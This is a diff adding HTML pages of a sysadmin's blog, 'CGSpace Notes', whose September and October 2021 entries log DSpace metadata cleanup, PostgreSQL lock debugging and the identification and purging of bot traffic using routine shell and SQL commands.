+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>localhost/dspace63= &gt; \COPY (SELECT DISTINCT text_value as &#34;cg.contributor.affiliation&#34;, count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC LIMIT 1000) to /tmp/2021-09-23-affiliations.csv WITH CSV HEADER;
+</span></span><span style="display:flex;"><span>$ csvcut -c <span style="color:#ae81ff">1</span> /tmp/2021-09-23-affiliations.csv | sed 1d &gt; /tmp/affiliations.txt
+</span></span></code></pre></div><ul>
+<li>Peter also sent me 310 corrections and 234 deletions for donors so I applied those and updated the controlled vocabularies too</li>
+<li>Move some One CGIAR-related collections around the CGSpace hierarchy for Peter Ballantyne</li>
+<li>Mohammed Salem asked me for an ID to UUID mapping for CGSpace collections, so I generated one similar to the ID one I sent him in 2020-11:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>localhost/dspace63= &gt; \COPY (SELECT collection_id,uuid FROM collection WHERE collection_id IS NOT NULL) TO /tmp/2021-09-23-collection-id2uuid.csv WITH CSV HEADER;
+</span></span><span style="display:flex;"><span>COPY 1139
+</span></span></code></pre></div><h2 id="2021-09-24">2021-09-24</h2>
+<ul>
+<li>Peter and Abenet agreed that we should consider converting more of our UPPER CASE metadata values to Title Case
+<ul>
+<li>It seems that these fields are all still using UPPER CASE:
+<ul>
+<li>cg.subject.alliancebiovciat</li>
+<li>cg.species.breed</li>
+<li>cg.subject.bioversity</li>
+<li>cg.subject.ccafs</li>
+<li>cg.subject.ciat</li>
+<li>cg.subject.cip</li>
+<li>cg.identifier.iitatheme</li>
+<li>cg.subject.iita</li>
+<li>cg.subject.ilri</li>
+<li>cg.subject.pabra</li>
+<li>cg.river.basin</li>
+<li>cg.coverage.subregion (done)</li>
+<li>dcterms.audience (done)</li>
+<li>cg.subject.wle</li>
+</ul>
+</li>
+<li>We can do some of these without even asking anyone, for example <code>cg.coverage.subregion</code>, <code>cg.river.basin</code>, and <code>dcterms.audience</code></li>
+</ul>
+</li>
+<li>First, I will look at <code>cg.coverage.subregion</code>
+<ul>
+<li>These should ideally come from ISO 3166-2 subdivisions</li>
+<li>I will sentence case them and then create a controlled vocabulary from those that are matching (and worry about cleaning the rest up later)</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>localhost/dspace63= &gt; UPDATE metadatavalue SET text_value=INITCAP(text_value) WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=231;
+</span></span><span style="display:flex;"><span>UPDATE 2903
+</span></span><span style="display:flex;"><span>localhost/dspace63= &gt; \COPY (SELECT DISTINCT text_value as &#34;cg.coverage.subregion&#34; FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 231) to /tmp/2021-09-24-subregions.txt;
+</span></span><span style="display:flex;"><span>COPY 1200
+</span></span></code></pre></div><ul>
+<li>Then I process the list for matches with my <code>subdivision-lookup.py</code> script, and extract only the values that matched:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/subdivision-lookup.py -i /tmp/2021-09-24-subregions.txt -o /tmp/subregions.csv
+</span></span><span style="display:flex;"><span>$ csvgrep -c matched -m <span style="color:#e6db74">&#39;true&#39;</span> /tmp/subregions.csv | csvcut -c <span style="color:#ae81ff">1</span> | sed 1d &gt; /tmp/subregions-matched.txt
+</span></span><span style="display:flex;"><span>$ wc -l /tmp/subregions-matched.txt 
+</span></span><span style="display:flex;"><span>81 /tmp/subregions-matched.txt
+</span></span></code></pre></div><ul>
+<li>Then I updated the controlled vocabulary in the submission forms</li>
+<li>I did the same for <code>dcterms.audience</code>, taking special care to a few all-caps values:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>localhost/dspace63= &gt; UPDATE metadatavalue SET text_value=INITCAP(text_value) WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=144 AND text_value != &#39;NGOS&#39; AND text_value != &#39;CGIAR&#39;;
+</span></span><span style="display:flex;"><span>localhost/dspace63= &gt; UPDATE metadatavalue SET text_value=&#39;NGOs&#39; WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=144 AND text_value = &#39;NGOS&#39;;
+</span></span></code></pre></div><ul>
+<li>Update submission form comment for DOIs because it was still recommending people use the &ldquo;dx.doi.org&rdquo; format even though I batch updated all DOIs to the &ldquo;doi.org&rdquo; format a few times in the last year
+<ul>
+<li>Then I updated all existing metadata to the new format again:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>dspace=# UPDATE metadatavalue SET text_value = regexp_replace(text_value, &#39;https://dx.doi.org&#39;, &#39;https://doi.org&#39;) WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 220 AND text_value LIKE &#39;https://dx.doi.org%&#39;;
+</span></span><span style="display:flex;"><span>UPDATE 49
+</span></span></code></pre></div><h2 id="2021-09-26">2021-09-26</h2>
+<ul>
+<li>Mohammed Salem told me last week that MELSpace and WorldFish have been upgraded to DSpace 6 so I updated the repository setup in AReS to use the UUID field instead of IDs
+<ul>
+<li>This could explain how I had problems harvesting last week, when I only had 90,000 items&hellip;</li>
+</ul>
+</li>
+<li>I started a fresh harvest on AReS
+<ul>
+<li>I realized that the sitemap on MELSpace is missing so AReS skips it, which means we cannot harvest right now&hellip; ouch</li>
+<li>I sent a message to Salem and he fixed it quickly</li>
+<li>I added WorldFish&rsquo;s DSpace Statistics API instance to AReS before starting the plugins and now our numbers are much higher, nice!</li>
+</ul>
+</li>
+</ul>
+<h2 id="2021-09-27">2021-09-27</h2>
+<ul>
+<li>Add CGIAR Action Area (cg.subject.actionArea) to CGSpace as Peter had asked me a few days ago</li>
+</ul>
+<h2 id="2021-09-28">2021-09-28</h2>
+<ul>
+<li>Francesca from the Alliance asked for help moving a bunch of reports from one collections to another on CGSpace
+<ul>
+<li>She is having problems with the &ldquo;move&rdquo; dialog taking minutes for each item</li>
+<li>I exported the collection and sent her a copy with just the few fields she would need in order to mark the ones that need to move, then I can do the rest:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ csvcut -c <span style="color:#e6db74">&#39;id,collection,dc.title[en_US]&#39;</span> ~/Downloads/10568-106990.csv &gt; /tmp/2021-09-28-alliance-reports.csv
+</span></span></code></pre></div><ul>
+<li>She sent it back fairly quickly with a new column marked &ldquo;Move&rdquo; so I extracted those items that matched and set them to the new owning collection:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ csvgrep -c Move -m <span style="color:#e6db74">&#39;Yes&#39;</span> ~/Downloads/2021_28_09_alliance_reports_csv.csv | csvcut -c 1,2 | sed <span style="color:#e6db74">&#39;s_10568/106990_10568/111506_&#39;</span> &gt; /tmp/alliance-move.csv
+</span></span></code></pre></div><ul>
+<li>Maria from the Alliance emailed us to say that approving submissions was slow on CGSpace
+<ul>
+<li>I looked at the PostgreSQL activity and it seems low:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>postgres@linode18:~$ psql -c &#39;SELECT * FROM pg_stat_activity&#39; | wc -l
+</span></span><span style="display:flex;"><span>59
+</span></span></code></pre></div><ul>
+<li>Locks look high though:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>postgres@linode18:~$ psql -c &#39;SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;&#39; | sort | uniq -c | wc -l
+</span></span><span style="display:flex;"><span>1154
+</span></span></code></pre></div><ul>
+<li>Indeed it seems something started causing locks to increase yesterday:</li>
+</ul>
+<p><img src="/cgspace-notes/2021/09/postgres_locks_ALL-week.png" alt="PostgreSQL locks week"></p>
+<ul>
+<li>And query length increasing since yesterday:</li>
+</ul>
+<p><img src="/cgspace-notes/2021/09/postgres_querylength_ALL-week.png" alt="PostgreSQL query length week"></p>
+<ul>
+<li>The number of DSpace sessions is normal, hovering around 1,000&hellip;</li>
+<li>Looking closer at the PostgreSQL activity log, I see the locks are all held by the <code>dspaceCli</code> user&hellip; which seem weird:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>postgres@linode18:~$ psql -c &#34;SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid WHERE application_name=&#39;dspaceCli&#39;;&#34; | wc -l
+</span></span><span style="display:flex;"><span>1096
+</span></span></code></pre></div><ul>
+<li>Now I&rsquo;m wondering why there are no connections from <code>dspaceApi</code> or <code>dspaceWeb</code>. Could it be that our Tomcat JDBC pooling via JNDI isn&rsquo;t working?
+<ul>
+<li>I see the same thing on DSpace Test hmmmm</li>
+<li>The configuration in <code>server.xml</code> is correct, but it could be that when I changed to using the updated JDBC driver from <code>pom.xml</code> instead of dropping it in the Tomcat lib directory that something broke&hellip;</li>
+<li>I downloaded the latest JDBC jar and put it in Tomcat&rsquo;s lib directory on DSpace Test and after restarting Tomcat I can see connections from <code>dspaceWeb</code> and <code>dspaceApi</code> again</li>
+<li>I will do the same on CGSpace and then revert the JDBC change in Ansible and DSpace <code>pom.xml</code></li>
+</ul>
+</li>
+</ul>
+<h2 id="2021-09-29">2021-09-29</h2>
+<ul>
+<li>Export a list of ILRI subjects from CGSpace to validate against AGROVOC for Peter and Abenet:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>localhost/dspace63= &gt; \COPY (SELECT DISTINCT text_value FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 203) to /tmp/2021-09-29-ilri-subject.txt;
+</span></span><span style="display:flex;"><span>COPY 149
+</span></span></code></pre></div><ul>
+<li>Then validate and format the matches:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/agrovoc-lookup.py -i /tmp/2021-09-29-ilri-subject.txt -o /tmp/2021-09-29-ilri-subjects.csv -d
+</span></span><span style="display:flex;"><span>$ csvcut -c subject,<span style="color:#e6db74">&#39;match type&#39;</span> /tmp/2021-09-29-ilri-subjects.csv | sed -e <span style="color:#e6db74">&#39;s/match type/matched/&#39;</span> -e <span style="color:#e6db74">&#39;s/\(alt\|pref\)Label/yes/&#39;</span> &gt; /tmp/2021-09-29-ilri-subjects2.csv
+</span></span></code></pre></div><ul>
+<li>I talked to Salem about depositing from MEL to CGSpace
+<ul>
+<li>He mentioned that the one issue is that when you deposit to a workflow you don&rsquo;t get a Handle or any kind of identifier back!</li>
+<li>We might have to come to some kind of agreement that they deposit items without going into the workflow but that we have some kind of edit role in MEL</li>
+<li>He also said that they are looking into using the Research Organization Registry (RoR) in MEL, at least adding the <code>ror_id</code> and storing it</li>
+<li>I need to propose this to Peter again and perhaps start aligning our affiliations closer (I could even do something like the country codes with a process that scans every day)</li>
+</ul>
+</li>
+<li>Talk to Moayad about OpenRXV
+<ul>
+<li>We decided that we&rsquo;d keep harvesting all the Handles from the Altmetric prefix API, but then have a plugin to retrive DOI scores that we can run manually</li>
+</ul>
+</li>
+</ul>
+<h2 id="2021-09-30">2021-09-30</h2>
+<ul>
+<li>Look over 292 non-IWMI publications from Udana for inclusion into the Virtual library on water management collection on CGSpace
+<ul>
+<li>I did some minor cleanup to remove blank columns and run it through the csv-metadata-quality tool</li>
+<li>I told him to add licenses and journal volume/issue and asked Abenet for input as well</li>
+</ul>
+</li>
+</ul>
+<!-- raw HTML omitted -->
+
+  
+
+  
+
+</article> 
+
+
+
+        </div> <!-- /.blog-main -->
+
+        <aside class="col-sm-3 ml-auto blog-sidebar">
+  
+
+  
+        <section class="sidebar-module">
+    <h4>Recent Posts</h4>
+    <ol class="list-unstyled">
+
+
+<li><a href="/cgspace-notes/2023-07/">July, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-06/">June, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-05/">May, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-04/">April, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-03/">March, 2023</a></li>
+
+    </ol>
+  </section>
+
+  
+
+  
+  <section class="sidebar-module">
+    <h4>Links</h4>
+    <ol class="list-unstyled">
+      
+      <li><a href="https://cgspace.cgiar.org">CGSpace</a></li>
+      
+      <li><a href="https://dspacetest.cgiar.org">DSpace Test</a></li>
+      
+      <li><a href="https://github.com/ilri/DSpace">CGSpace @ GitHub</a></li>
+      
+    </ol>
+  </section>
+  
+</aside>
+
+
+      </div> <!-- /.row -->
+    </div> <!-- /.container -->
+    
+
+    
+    <footer class="blog-footer">
+      <p dir="auto">
+      
+      Blog template created by <a href="https://twitter.com/mdo">@mdo</a>, ported to Hugo by <a href='https://twitter.com/mralanorth'>@mralanorth</a>.
+      
+      </p>
+      <p>
+      <a href="#">Back to top</a>
+      </p>
+    </footer>
+    
+
+  </body>
+
+</html>
diff --git a/docs/2021-10/index.html b/docs/2021-10/index.html
new file mode 100644
index 000000000..b66ef0538
--- /dev/null
+++ b/docs/2021-10/index.html
@@ -0,0 +1,845 @@
+<!DOCTYPE html>
+<html lang="en" >
+
+  <head>
+    <meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
+
+
+<meta property="og:title" content="October, 2021" />
+<meta property="og:description" content="2021-10-01
+
+Export all affiliations on CGSpace and run them against the latest RoR data dump:
+
+localhost/dspace63= &gt; \COPY (SELECT DISTINCT text_value as &#34;cg.contributor.affiliation&#34;, count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC) to /tmp/2021-10-01-affiliations.csv WITH CSV HEADER;
+$ csvcut -c 1 /tmp/2021-10-01-affiliations.csv | sed 1d &gt; /tmp/2021-10-01-affiliations.txt
+$ ./ilri/ror-lookup.py -i /tmp/2021-10-01-affiliations.txt -r 2021-09-23-ror-data.json -o /tmp/2021-10-01-affili
+ations-matching.csv
+$ csvgrep -c matched -m true /tmp/2021-10-01-affiliations-matching.csv | sed 1d | wc -l 
+1879
+$ wc -l /tmp/2021-10-01-affiliations.txt 
+7100 /tmp/2021-10-01-affiliations.txt
+
+So we have 1879/7100 (26.46%) matching already
+" />
+<meta property="og:type" content="article" />
+<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/2021-10/" />
+<meta property="article:published_time" content="2021-10-01T11:14:07+03:00" />
+<meta property="article:modified_time" content="2021-11-01T10:48:13+02:00" />
+
+
+
+<meta name="twitter:card" content="summary"/>
+<meta name="twitter:title" content="October, 2021"/>
+<meta name="twitter:description" content="2021-10-01
+
+Export all affiliations on CGSpace and run them against the latest RoR data dump:
+
+localhost/dspace63= &gt; \COPY (SELECT DISTINCT text_value as &#34;cg.contributor.affiliation&#34;, count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC) to /tmp/2021-10-01-affiliations.csv WITH CSV HEADER;
+$ csvcut -c 1 /tmp/2021-10-01-affiliations.csv | sed 1d &gt; /tmp/2021-10-01-affiliations.txt
+$ ./ilri/ror-lookup.py -i /tmp/2021-10-01-affiliations.txt -r 2021-09-23-ror-data.json -o /tmp/2021-10-01-affili
+ations-matching.csv
+$ csvgrep -c matched -m true /tmp/2021-10-01-affiliations-matching.csv | sed 1d | wc -l 
+1879
+$ wc -l /tmp/2021-10-01-affiliations.txt 
+7100 /tmp/2021-10-01-affiliations.txt
+
+So we have 1879/7100 (26.46%) matching already
+"/>
+<meta name="generator" content="Hugo 0.112.3">
+
+
+    
+<script type="application/ld+json">
+{
+  "@context": "http://schema.org",
+  "@type": "BlogPosting",
+  "headline": "October, 2021",
+  "url": "https://alanorth.github.io/cgspace-notes/2021-10/",
+  "wordCount": "4224",
+  "datePublished": "2021-10-01T11:14:07+03:00",
+  "dateModified": "2021-11-01T10:48:13+02:00",
+  "author": {
+    "@type": "Person",
+    "name": "Alan Orth"
+  },
+  "keywords": "Notes"
+}
+</script>
+
+
+
+    <link rel="canonical" href="https://alanorth.github.io/cgspace-notes/2021-10/">
+
+    <title>October, 2021 | CGSpace Notes</title>
+
+    
+    <!-- combined, minified CSS -->
+    
+    <link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
+    
+
+    <!-- minified Font Awesome for SVG icons -->
+    
+    <script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
+
+    <!-- RSS 2.0 feed -->
+    
+
+    
+
+  </head>
+
+  <body>
+
+    
+    <div class="blog-masthead">
+      <div class="container">
+        <nav class="nav blog-nav">
+          <a class="nav-link " href="https://alanorth.github.io/cgspace-notes/">Home</a>
+        </nav>
+      </div>
+    </div>
+    
+
+    
+    
+    <header class="blog-header">
+      <div class="container">
+        <h1 class="blog-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/" rel="home">CGSpace Notes</a></h1>
+        <p class="lead blog-description" dir="auto">Documenting day-to-day work on the <a href="https://cgspace.cgiar.org">CGSpace</a> repository.</p>
+      </div>
+    </header>
+    
+    
+
+    
+    <div class="container">
+      <div class="row">
+        <div class="col-sm-8 blog-main">
+
+          
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2021-10/">October, 2021</a></h2>
+    <p class="blog-post-meta">
+<time datetime="2021-10-01T11:14:07+03:00">Fri Oct 01, 2021</time>
+ in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2021-10-01">2021-10-01</h2>
+<ul>
+<li>Export all affiliations on CGSpace and run them against the latest RoR data dump:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>localhost/dspace63= &gt; \COPY (SELECT DISTINCT text_value as &#34;cg.contributor.affiliation&#34;, count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC) to /tmp/2021-10-01-affiliations.csv WITH CSV HEADER;
+</span></span><span style="display:flex;"><span>$ csvcut -c <span style="color:#ae81ff">1</span> /tmp/2021-10-01-affiliations.csv | sed 1d &gt; /tmp/2021-10-01-affiliations.txt
+</span></span><span style="display:flex;"><span>$ ./ilri/ror-lookup.py -i /tmp/2021-10-01-affiliations.txt -r 2021-09-23-ror-data.json -o /tmp/2021-10-01-affili
+</span></span><span style="display:flex;"><span>ations-matching.csv
+</span></span><span style="display:flex;"><span>$ csvgrep -c matched -m true /tmp/2021-10-01-affiliations-matching.csv | sed 1d | wc -l 
+</span></span><span style="display:flex;"><span>1879
+</span></span><span style="display:flex;"><span>$ wc -l /tmp/2021-10-01-affiliations.txt 
+</span></span><span style="display:flex;"><span>7100 /tmp/2021-10-01-affiliations.txt
+</span></span></code></pre></div><ul>
+<li>So we have 1879/7100 (26.46%) matching already</li>
+</ul>
+<h2 id="2021-10-03">2021-10-03</h2>
+<ul>
+<li>Dominique from IWMI asked me for information about how CGSpace partners are using CGSpace APIs to feed their websites</li>
+<li>Start a fresh indexing on AReS</li>
+<li>Udana sent me his file of 292 non-IWMI publications for the Virtual library on water management
+<ul>
+<li>He added licenses</li>
+<li>I want to clean up the <code>dcterms.extent</code> field though because it has volume, issue, and pages there</li>
+<li>I cloned the column several times and extracted values based on their positions, for example:
+<ul>
+<li>Volume: <code>value.partition(&quot;:&quot;)[0]</code></li>
+<li>Issue: <code>value.partition(&quot;(&quot;)[2].partition(&quot;)&quot;)[0]</code></li>
+<li>Page: <code>&quot;p. &quot; + value.replace(&quot;.&quot;, &quot;&quot;)</code></li>
+</ul>
+</li>
+</ul>
+</li>
+</ul>
+<h2 id="2021-10-04">2021-10-04</h2>
+<ul>
+<li>Start looking at the last month of Solr statistics on CGSpace
+<ul>
+<li>I see a number of IPs with &ldquo;normal&rdquo; user agents who clearly behave like bots
+<ul>
+<li>198.15.130.18: 21,000 requests to /discover with a normal-looking user agent, from ASN 11282 (SERVERYOU, US)</li>
+<li>93.158.90.107: 8,500 requests to handle and browse links with a Firefox 84.0 user agent, from ASN 12552 (IPO-EU, SE)</li>
+<li>193.235.141.162: 4,800 requests to handle, browse, and discovery links with a Firefox 84.0 user agent, from ASN 51747 (INTERNETBOLAGET, SE)</li>
+<li>3.225.28.105: 2,900 requests to REST API for the CIAT Story Maps collection with a normal user agent, from ASN 14618 (AMAZON-AES, US)</li>
+<li>34.228.236.6: 2,800 requests to discovery for the CGIAR System community with user agent <code>Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)</code>, from ASN 14618 (AMAZON-AES, US)</li>
+<li>18.212.137.2: 2,800 requests to discovery for the CGIAR System community with user agent <code>Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)</code>, from ASN 14618 (AMAZON-AES, US)</li>
+<li>3.81.123.72: 2,800 requests to discovery and handles for the CGIAR System community with user agent <code>Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)</code>, from ASN 14618 (AMAZON-AES, US)</li>
+<li>3.227.16.188: 2,800 requests to discovery and handles for the CGIAR System community with user agent <code>Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)</code>, from ASN 14618 (AMAZON-AES, US)</li>
+</ul>
+</li>
+<li>Looking closer into the requests with this Mozilla/4.0 user agent, I see 500+ IPs using it:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># zcat --force /var/log/nginx/*.log* | grep <span style="color:#e6db74">&#39;Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)&#39;</span> | awk <span style="color:#e6db74">&#39;{print $1}&#39;</span> | sort | uniq &gt; /tmp/mozilla-4.0-ips.txt
+</span></span><span style="display:flex;"><span># wc -l /tmp/mozilla-4.0-ips.txt 
+</span></span><span style="display:flex;"><span>543 /tmp/mozilla-4.0-ips.txt
+</span></span></code></pre></div><ul>
+<li>Then I resolved the IPs and extracted the ones belonging to Amazon:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/resolve-addresses-geoip2.py -i /tmp/mozilla-4.0-ips.txt -k <span style="color:#e6db74">&#34;</span>$ABUSEIPDB_API_KEY<span style="color:#e6db74">&#34;</span> -o /tmp/mozilla-4.0-ips.csv
+</span></span><span style="display:flex;"><span>$ csvgrep -c asn -m <span style="color:#ae81ff">14618</span> /tmp/mozilla-4.0-ips.csv | csvcut -c ip | sed 1d | tee /tmp/amazon-ips.txt | wc -l
+</span></span></code></pre></div><ul>
+<li>I am thinking I will purge them all, as I have several indicators that they are bots: mysterious user agent, IP owned by Amazon</li>
+<li>Even more interesting, these requests are weighted VERY heavily on the CGIAR System community:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>   1592 GET /handle/10947/2526
+</span></span><span style="display:flex;"><span>   1592 GET /handle/10947/2527
+</span></span><span style="display:flex;"><span>   1592 GET /handle/10947/34
+</span></span><span style="display:flex;"><span>   1593 GET /handle/10947/6
+</span></span><span style="display:flex;"><span>   1594 GET /handle/10947/1
+</span></span><span style="display:flex;"><span>   1598 GET /handle/10947/2515
+</span></span><span style="display:flex;"><span>   1598 GET /handle/10947/2516
+</span></span><span style="display:flex;"><span>   1599 GET /handle/10568/101335
+</span></span><span style="display:flex;"><span>   1599 GET /handle/10568/91688
+</span></span><span style="display:flex;"><span>   1599 GET /handle/10947/2517
+</span></span><span style="display:flex;"><span>   1599 GET /handle/10947/2518
+</span></span><span style="display:flex;"><span>   1599 GET /handle/10947/2519
+</span></span><span style="display:flex;"><span>   1599 GET /handle/10947/2708
+</span></span><span style="display:flex;"><span>   1599 GET /handle/10947/2871
+</span></span><span style="display:flex;"><span>   1600 GET /handle/10568/89342
+</span></span><span style="display:flex;"><span>   1600 GET /handle/10947/4467
+</span></span><span style="display:flex;"><span>   1607 GET /handle/10568/103816
+</span></span><span style="display:flex;"><span> 290382 GET /handle/10568/83389
+</span></span></code></pre></div><ul>
+<li>Before I purge all those I will ask someone Samuel Stacey from the System Office to hopefully get an insight&hellip;</li>
+<li>Meeting with Michael Victor, Peter, Jane, and Abenet about the future of repositories in the One CGIAR</li>
+<li>Meeting with Michelle from Altmetric about their new CSV upload system
+<ul>
+<li>I sent her some examples of Handles that have DOIs, but no linked score (yet) to see if an association will be created when she uploads them</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code class="language-csv" data-lang="csv">doi,handle
+10.1016/j.agsy.2021.103263,10568/115288
+10.3389/fgene.2021.723360,10568/115287
+10.3389/fpls.2021.720670,10568/115285
+</code></pre><ul>
+<li>Extract the AGROVOC subjects from IWMI&rsquo;s 292 publications to validate them against AGROVOC:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ csvcut -c <span style="color:#e6db74">&#39;dcterms.subject[en_US]&#39;</span> ~/Downloads/2021-10-03-non-IWMI-publications.csv | sed -e 1d -e <span style="color:#e6db74">&#39;s/||/\n/g&#39;</span> -e <span style="color:#e6db74">&#39;s/&#34;//g&#39;</span> | sort -u &gt; /tmp/agrovoc.txt
+</span></span><span style="display:flex;"><span>$ ./ilri/agrovoc-lookup.py -i /tmp/agrovoc-sorted.txt -o /tmp/agrovoc-matches.csv
+</span></span><span style="display:flex;"><span>$ csvgrep -c <span style="color:#e6db74">&#39;number of matches&#39;</span> -m <span style="color:#e6db74">&#39;0&#39;</span> /tmp/agrovoc-matches.csv | csvcut -c <span style="color:#ae81ff">1</span> &gt; /tmp/invalid-agrovoc.csv
+</span></span></code></pre></div><h2 id="2021-10-05">2021-10-05</h2>
+<ul>
+<li>Sam put me in touch with Dodi from the System Office web team and he confirmed that the Amazon requests are not theirs
+<ul>
+<li>I added <code>Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)</code> to the list of bad bots in nginx</li>
+<li>I purged all the Amazon IPs using this user agent, as well as the few other IPs I identified yesterday</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/check-spider-ip-hits.sh -f /tmp/robot-ips.txt -p
+</span></span><span style="display:flex;"><span>...
+</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
+</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>Total number of bot hits purged: 465119
+</span></span></code></pre></div><h2 id="2021-10-06">2021-10-06</h2>
+<ul>
+<li>Thinking about how we could check for duplicates before importing
+<ul>
+<li>I found out that <a href="https://www.freecodecamp.org/news/fuzzy-string-matching-with-postgresql/">PostgreSQL has a built-in similarity function</a>:</li>
+</ul>
+</li>
+</ul>
